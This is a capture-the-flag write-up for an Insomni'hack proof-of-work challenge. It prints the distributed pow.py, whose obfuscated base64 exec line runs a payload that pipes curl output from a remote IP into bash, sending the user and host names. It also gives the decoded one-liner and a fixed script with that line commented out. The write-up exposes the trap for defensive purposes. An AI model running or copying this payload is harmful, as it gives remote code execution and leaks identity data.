
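Just run python pow.py <target>, where target is the value provided by the server, and get the flag. Disable the `exec` line in pow.py first, as shown below: the script as distributed runs a hidden payload when it finds the answer.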

nc welcome.insomnihack.ch 1337

the pow.py is:

```
#!/usr/bin/python3

import base64
import hashlib
import os
import sys

# Proof-of-work prefix, read from the first command-line argument
# (the write-up says this is the value provided by the server).
target = sys.argv[1]
# Candidate counter; pow() increments it until the hash prefix matches.
i = 0

def pow():
    """Search for an integer whose MD5 hex digest starts with ``target``.

    Counts upward from the module-level ``i``, hashing ``str(i)`` each time,
    and compares the first six hex characters of the digest with ``target``.
    On a match it executes a base64-encoded payload, prints ``i`` and exits.

    This is the challenge file as distributed and is NOT safe to run; see
    the comment on the ``exec`` line.
    """
    global i, target
    while True:
        m = hashlib.md5()
        m.update(str(i).encode())
        h = m.hexdigest()
        if h[:6] == target:
            # Hidden payload: the blob decodes to Python that adds 1337 to i
            # (so the value printed below is no longer the one that matched)
            # and calls os.system() to run curl against a remote host with the
            # local user and host names in the URL path. On non-Windows
            # systems the response is piped into bash, i.e. remote code
            # execution. Decode and read such blobs instead of executing them.
            exec(base64.b64decode('Z2xvYmFsIGk7aSs9MTMzNzt4PW9zLm5hbWU7eCs9Ii8kKHdob2FtaSlAJChob3N0bmFtZSl8YmFzaCJpZiB4IT0ibnQiZWxzZSIvJVVTRVJOQU1FJUAlVVNFUkRPTUFJTiUiO29zLnN5c3RlbSgiY3VybCAtTnMgMzQuNjUuMTg3LjE0MS8iK3gp'))
            print(i)
            exit(0)
        i += 1

# Script entry point: start the search when the file is executed directly.
if __name__ == '__main__':
    pow()
```
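**The base64 string decodes to the code below. It adds 1337 to `i`, so the printed value is no longer the one whose hash matched, and it also calls `os.system` to run `curl` against a remote host with the local user and host name in the URL path; on non-Windows systems the response is piped to `bash`:**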

`global i;i+=1337;x=os.name;x+="/$(whoami)@$(hostname)|bash"if x!="nt"else"/%USERNAME%@%USERDOMAIN%";os.system("curl -Ns 34.65.187.141/"+x)`

# Just comment out the exec line, run pow.py with the value generated by **nc welcome.insomnihack.ch 1337** and send the value it prints back to **nc welcome.insomnihack.ch 1337**

```
#!/usr/bin/python3

import base64
import hashlib
import os
import sys

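# The proof-of-work prefix is handed out by the server and passed as the
# first command-line argument; fail with a usage line instead of an
# IndexError traceback when it is missing.
if len(sys.argv) < 2:
    sys.exit("usage: pow.py <target>")
# hexdigest() is always lowercase, so normalise the pasted value to match.
target = sys.argv[1].strip().lower()
# Candidate counter; pow() increments it until the hash prefix matches.
i = 0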

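def pow():
    """Search for an integer whose MD5 hex digest starts with ``target``.

    Counts upward from the module-level ``i``, hashing ``str(i)`` each time.
    The first integer whose digest begins with ``target`` is printed and the
    process exits with status 0. The function never returns normally.
    """
    global i, target
    while True:
        h = hashlib.md5(str(i).encode()).hexdigest()
        # startswith() equals the original h[:6] comparison for a six-character
        # target and keeps working if the server hands out another length.
        if h.startswith(target):
            # The distributed script executed the line below at this point.
            # It is kept commented out, on its own line, so it can be matched
            # against the original file; deleting it entirely is safer still.
            # exec(base64.b64decode('Z2xvYmFsIGk7aSs9MTMzNzt4PW9zLm5hbWU7eCs9Ii8kKHdob2FtaSlAJChob3N0bmFtZSl8YmFzaCJpZiB4IT0ibnQiZWxzZSIvJVVTRVJOQU1FJUAlVVNFUkRPTUFJTiUiO29zLnN5c3RlbSgiY3VybCAtTnMgMzQuNjUuMTg3LjE0MS8iK3gp'))
            print(i)
            # sys.exit() rather than the site-provided exit(), which is not
            # guaranteed to exist (for example under ``python -S``).
            sys.exit(0)
        i += 1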

# Run the search only when the file is executed as a script, not on import.
if __name__ == "__main__":
    pow()
```